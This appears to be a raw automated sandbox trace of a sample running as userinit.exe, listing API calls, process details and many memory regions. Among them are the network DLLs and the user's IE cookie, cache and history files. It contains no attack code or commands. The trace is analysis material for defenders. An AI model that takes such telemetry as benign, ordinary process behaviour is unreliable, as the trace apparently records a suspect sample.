[0160.651] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14ea8c, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x14eaa0, lpMaximumComponentLength=0x14ea9c, lpFileSystemFlags=0x14ea98, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14eaa0*=0x90c08a66, lpMaximumComponentLength=0x14ea9c*=0xff, lpFileSystemFlags=0x14ea98*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0160.652] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14e990, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0160.652] GetSystemDefaultLangID () returned 0x670409
[0160.652] VerLanguageNameA (in: wLang=0x409, szLang=0x14ea44, cchLang=0x64 | out: szLang="English (United States)") returned 0x17
[0160.653] ExitProcess (uExitCode=0x0)
Thread:
id = 278
os_tid = 0x838
Thread:
id = 279
os_tid = 0x83c
Process:
id = "44"
image_name = "userinit.exe"
filename = "c:\\windows\\system32\\userinit.exe"
page_root = "0x7f1be860"
os_pid = "0x844"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "25"
os_parent_pid = "0xf18"
cmd_line = "\"C:\\Windows\\System32\\userinit.exe\""
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 5081
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 5082
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 5083
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 5084
start_va = 0xd0000
end_va = 0xd8fff
entry_point = 0xd0000
region_type = mapped_file
name = "userinit.exe"
filename = "\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")
Region:
id = 5085
start_va = 0x170000
end_va = 0x1affff
entry_point = 0x0
region_type = private
name = "private_0x0000000000170000"
filename = ""
Region:
id = 5086
start_va = 0x400000
end_va = 0x462fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 5087
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 5088
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 5089
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 5090
start_va = 0x7ffd7000
end_va = 0x7ffd7fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd7000"
filename = ""
Region:
id = 5091
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 5092
start_va = 0x2b0000
end_va = 0x3affff
entry_point = 0x0
region_type = private
name = "private_0x00000000002b0000"
filename = ""
Region:
id = 5093
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 5094
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 5095
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 5096
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 5097
start_va = 0x2a0000
end_va = 0x2affff
entry_point = 0x0
region_type = private
name = "private_0x00000000002a0000"
filename = ""
Region:
id = 5098
start_va = 0x6d720000
end_va = 0x6d7a3fff
entry_point = 0x6d720000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 5099
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 5100
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 5101
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 5102
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 5103
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 5104
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 5105
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 5106
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 5107
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 5108
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 5109
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 5110
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 5111
start_va = 0x1b0000
end_va = 0x277fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001b0000"
filename = ""
Region:
id = 5112
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 5113
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 5114
start_va = 0x20000
end_va = 0x20fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 5115
start_va = 0xc0000
end_va = 0xc0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 5116
start_va = 0x470000
end_va = 0x570fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000470000"
filename = ""
Region:
id = 5117
start_va = 0x580000
end_va = 0x117ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000580000"
filename = ""
Region:
id = 5118
start_va = 0x1300000
end_va = 0x130ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001300000"
filename = ""
Region:
id = 5119
start_va = 0x1180000
end_va = 0x127ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001180000"
filename = ""
Region:
id = 5120
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 5121
start_va = 0xe0000
end_va = 0x14ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 5122
start_va = 0x1310000
end_va = 0x13eefff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001310000"
filename = ""
Region:
id = 5123
start_va = 0xe0000
end_va = 0xe0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 5124
start_va = 0x110000
end_va = 0x14ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000110000"
filename = ""
Region:
id = 5125
start_va = 0x733b0000
end_va = 0x733c2fff
entry_point = 0x733b0000
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 5126
start_va = 0x13f0000
end_va = 0x14cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000013f0000"
filename = ""
Region:
id = 5127
start_va = 0x14d0000
end_va = 0x1dfffff
entry_point = 0x14d0000
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 5128
start_va = 0xf0000
end_va = 0xf6fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000f0000"
filename = ""
Region:
id = 5129
start_va = 0x100000
end_va = 0x101fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000100000"
filename = ""
Region:
id = 5130
start_va = 0x1e00000
end_va = 0x21f2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001e00000"
filename = ""
Region:
id = 5131
start_va = 0x1280000
end_va = 0x12fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001280000"
filename = ""
Region:
id = 5132
start_va = 0x2200000
end_va = 0x230cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002200000"
filename = ""
Region:
id = 5133
start_va = 0x2310000
end_va = 0x240ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002310000"
filename = ""
Region:
id = 5134
start_va = 0x2410000
end_va = 0x260ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002410000"
filename = ""
Region:
id = 5135
start_va = 0x13f0000
end_va = 0x1470fff
entry_point = 0x0
region_type = private
name = "private_0x00000000013f0000"
filename = ""
Region:
id = 5136
start_va = 0x1490000
end_va = 0x14cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001490000"
filename = ""
Region:
id = 5137
start_va = 0x2610000
end_va = 0x2692fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002610000"
filename = ""
Region:
id = 5138
start_va = 0x13f0000
end_va = 0x1474fff
entry_point = 0x0
region_type = private
name = "private_0x00000000013f0000"
filename = ""
Region:
id = 5139
start_va = 0x2610000
end_va = 0x2696fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002610000"
filename = ""
Region:
id = 5140
start_va = 0x13f0000
end_va = 0x1478fff
entry_point = 0x0
region_type = private
name = "private_0x00000000013f0000"
filename = ""
Region:
id = 5141
start_va = 0x2610000
end_va = 0x269afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002610000"
filename = ""
Region:
id = 5142
start_va = 0x13f0000
end_va = 0x147cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000013f0000"
filename = ""
Region:
id = 5143
start_va = 0x2610000
end_va = 0x269efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002610000"
filename = ""
Region:
id = 5144
start_va = 0x13f0000
end_va = 0x1480fff
entry_point = 0x0
region_type = private
name = "private_0x00000000013f0000"
filename = ""
Region:
id = 5145
start_va = 0x2610000
end_va = 0x26a2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002610000"
filename = ""
Region:
id = 5146
start_va = 0x13f0000
end_va = 0x1484fff
entry_point = 0x0
region_type = private
name = "private_0x00000000013f0000"
filename = ""
Region:
id = 5147
start_va = 0x2610000
end_va = 0x26a6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002610000"
filename = ""
Region:
id = 5148
start_va = 0x13f0000
end_va = 0x1488fff
entry_point = 0x0
region_type = private
name = "private_0x00000000013f0000"
filename = ""
Region:
id = 5149
start_va = 0x2610000
end_va = 0x26aafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002610000"
filename = ""
Region:
id = 5150
start_va = 0x13f0000
end_va = 0x148cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000013f0000"
filename = ""
Region:
id = 5151
start_va = 0x2610000
end_va = 0x26aefff
entry_point = 0x0
region_type = private
name = "private_0x0000000002610000"
filename = ""
Region:
id = 5152
start_va = 0x26b0000
end_va = 0x2750fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 5153
start_va = 0x2760000
end_va = 0x2802fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002760000"
filename = ""
Region:
id = 5154
start_va = 0x2610000
end_va = 0x26b4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002610000"
filename = ""
Region:
id = 5155
start_va = 0x26c0000
end_va = 0x2766fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026c0000"
filename = ""
Region:
id = 5156
start_va = 0x2610000
end_va = 0x26b8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002610000"
filename = ""
Region:
id = 5157
start_va = 0x26c0000
end_va = 0x276afff
entry_point = 0x0
region_type = private
name = "private_0x00000000026c0000"
filename = ""
Region:
id = 5158
start_va = 0x2610000
end_va = 0x26bcfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002610000"
filename = ""
Region:
id = 5194
start_va = 0x26c0000
end_va = 0x276efff
entry_point = 0x0
region_type = private
name = "private_0x00000000026c0000"
filename = ""
Region:
id = 5195
start_va = 0x2770000
end_va = 0x2820fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002770000"
filename = ""
Region:
id = 5196
start_va = 0x2610000
end_va = 0x26c2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002610000"
filename = ""
Region:
id = 5205
start_va = 0x26d0000
end_va = 0x2784fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 5206
start_va = 0x2610000
end_va = 0x26c6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002610000"
filename = ""
Region:
id = 5207
start_va = 0x26d0000
end_va = 0x2788fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 5220
start_va = 0x2610000
end_va = 0x26cafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002610000"
filename = ""
Region:
id = 5221
start_va = 0x26d0000
end_va = 0x278cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 5222
start_va = 0x2610000
end_va = 0x26cefff
entry_point = 0x0
region_type = private
name = "private_0x0000000002610000"
filename = ""
Region:
id = 5224
start_va = 0x26d0000
end_va = 0x2790fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 5225
start_va = 0x27a0000
end_va = 0x2862fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027a0000"
filename = ""
Region:
id = 5226
start_va = 0x2610000
end_va = 0x26d4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002610000"
filename = ""
Region:
id = 5227
start_va = 0x26e0000
end_va = 0x27a6fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026e0000"
filename = ""
Region:
id = 5229
start_va = 0x2610000
end_va = 0x26d8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002610000"
filename = ""
Region:
id = 5230
start_va = 0x26e0000
end_va = 0x27aafff
entry_point = 0x0
region_type = private
name = "private_0x00000000026e0000"
filename = ""
Region:
id = 5231
start_va = 0x2610000
end_va = 0x26dcfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002610000"
filename = ""
Region:
id = 5236
start_va = 0x26e0000
end_va = 0x27aefff
entry_point = 0x0
region_type = private
name = "private_0x00000000026e0000"
filename = ""
Region:
id = 5237
start_va = 0x27b0000
end_va = 0x2880fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027b0000"
filename = ""
Region:
id = 5238
start_va = 0x2610000
end_va = 0x26e2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002610000"
filename = ""
Region:
id = 5244
start_va = 0x26f0000
end_va = 0x27c4fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026f0000"
filename = ""
Region:
id = 5245
start_va = 0x2610000
end_va = 0x26e6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002610000"
filename = ""
Region:
id = 5246
start_va = 0x26f0000
end_va = 0x27c8fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026f0000"
filename = ""
Region:
id = 5251
start_va = 0x2610000
end_va = 0x26eafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002610000"
filename = ""
Region:
id = 5252
start_va = 0x26f0000
end_va = 0x27ccfff
entry_point = 0x0
region_type = private
name = "private_0x00000000026f0000"
filename = ""
Region:
id = 5253
start_va = 0x2610000
end_va = 0x26eefff
entry_point = 0x0
region_type = private
name = "private_0x0000000002610000"
filename = ""
Region:
id = 5258
start_va = 0x26f0000
end_va = 0x27d0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026f0000"
filename = ""
Region:
id = 5259
start_va = 0x27e0000
end_va = 0x28c2fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027e0000"
filename = ""
Region:
id = 5260
start_va = 0x2610000
end_va = 0x26f4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002610000"
filename = ""
Region:
id = 5263
start_va = 0x2700000
end_va = 0x27e6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 5264
start_va = 0x2610000
end_va = 0x26f8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002610000"
filename = ""
Region:
id = 5269
start_va = 0x2700000
end_va = 0x27eafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 5270
start_va = 0x2610000
end_va = 0x26fcfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002610000"
filename = ""
Region:
id = 5271
start_va = 0x2700000
end_va = 0x27eefff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 5275
start_va = 0x27f0000
end_va = 0x28e0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027f0000"
filename = ""
Region:
id = 5276
start_va = 0x2610000
end_va = 0x2702fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002610000"
filename = ""
Region:
id = 5277
start_va = 0x2710000
end_va = 0x2804fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002710000"
filename = ""
Region:
id = 5282
start_va = 0x2610000
end_va = 0x2706fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002610000"
filename = ""
Region:
id = 5283
start_va = 0x2710000
end_va = 0x2808fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002710000"
filename = ""
Region:
id = 5287
start_va = 0x2610000
end_va = 0x270afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002610000"
filename = ""
Region:
id = 5288
start_va = 0x2710000
end_va = 0x280cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002710000"
filename = ""
Region:
id = 5289
start_va = 0x2610000
end_va = 0x270efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002610000"
filename = ""
Region:
id = 5293
start_va = 0x2710000
end_va = 0x2810fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002710000"
filename = ""
Region:
id = 5294
start_va = 0x2820000
end_va = 0x2922fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 5298
start_va = 0x2610000
end_va = 0x2714fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002610000"
filename = ""
Region:
id = 5299
start_va = 0x2720000
end_va = 0x2826fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 5302
start_va = 0x2610000
end_va = 0x2718fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002610000"
filename = ""
Region:
id = 5303
start_va = 0x2720000
end_va = 0x282afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 5307
start_va = 0x2610000
end_va = 0x271cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002610000"
filename = ""
Region:
id = 5308
start_va = 0x2720000
end_va = 0x282ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 5312
start_va = 0x2830000
end_va = 0x2942fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 5313
start_va = 0x750e0000
end_va = 0x750ebfff
entry_point = 0x750e0000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 5314
start_va = 0x751b0000
end_va = 0x752ccfff
entry_point = 0x751b0000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 5315
start_va = 0x754c0000
end_va = 0x756bafff
entry_point = 0x754c0000
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 5316
start_va = 0x75a80000
end_va = 0x75bb5fff
entry_point = 0x75a80000
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 5317
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 5318
start_va = 0x76920000
end_va = 0x76a14fff
entry_point = 0x76920000
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 5319
start_va = 0x71bf0000
end_va = 0x71c2bfff
entry_point = 0x71bf0000
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 5320
start_va = 0x150000
end_va = 0x150fff
entry_point = 0x150000
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 5321
start_va = 0x2950000
end_va = 0x2a4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002950000"
filename = ""
Region:
id = 5322
start_va = 0x160000
end_va = 0x160fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000160000"
filename = ""
Region:
id = 5325
start_va = 0x6d820000
end_va = 0x6d838fff
entry_point = 0x6d820000
region_type = mapped_file
name = "olepro32.dll"
filename = "\\Windows\\System32\\olepro32.dll" (normalized: "c:\\windows\\system32\\olepro32.dll")
Region:
id = 5326
start_va = 0x73b10000
end_va = 0x73b20fff
entry_point = 0x73b10000
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 5327
start_va = 0x73b00000
end_va = 0x73b08fff
entry_point = 0x73b00000
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 5328
start_va = 0x74f10000
end_va = 0x74f28fff
entry_point = 0x74f10000
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 5329
start_va = 0x73af0000
end_va = 0x73afefff
entry_point = 0x73af0000
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 5333
start_va = 0x2aa0000
end_va = 0x2adffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002aa0000"
filename = ""
Region:
id = 5334
start_va = 0x2bb0000
end_va = 0x2caffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002bb0000"
filename = ""
Region:
id = 5335
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 5336
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 5337
start_va = 0x2cb0000
end_va = 0x2f7efff
entry_point = 0x2cb0000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 5340
start_va = 0x280000
end_va = 0x281fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000280000"
filename = ""
Region:
id = 5341
start_va = 0x73e90000
end_va = 0x7402dfff
entry_point = 0x73e90000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll")
Region:
id = 5342
start_va = 0x290000
end_va = 0x290fff
entry_point = 0x290000
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 5343
start_va = 0x3b0000
end_va = 0x3b1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003b0000"
filename = ""
Region:
id = 5344
start_va = 0x74fa0000
end_va = 0x74fbafff
entry_point = 0x74fa0000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 5345
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 5346
start_va = 0x290000
end_va = 0x290fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000290000"
filename = ""
Region:
id = 5347
start_va = 0x75070000
end_va = 0x7507afff
entry_point = 0x75070000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 5348
start_va = 0x3c0000
end_va = 0x3ebfff
entry_point = 0x3c0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 5349
start_va = 0x3f0000
end_va = 0x3f7fff
entry_point = 0x3f0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 5350
start_va = 0x13f0000
end_va = 0x13fffff
entry_point = 0x13f0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
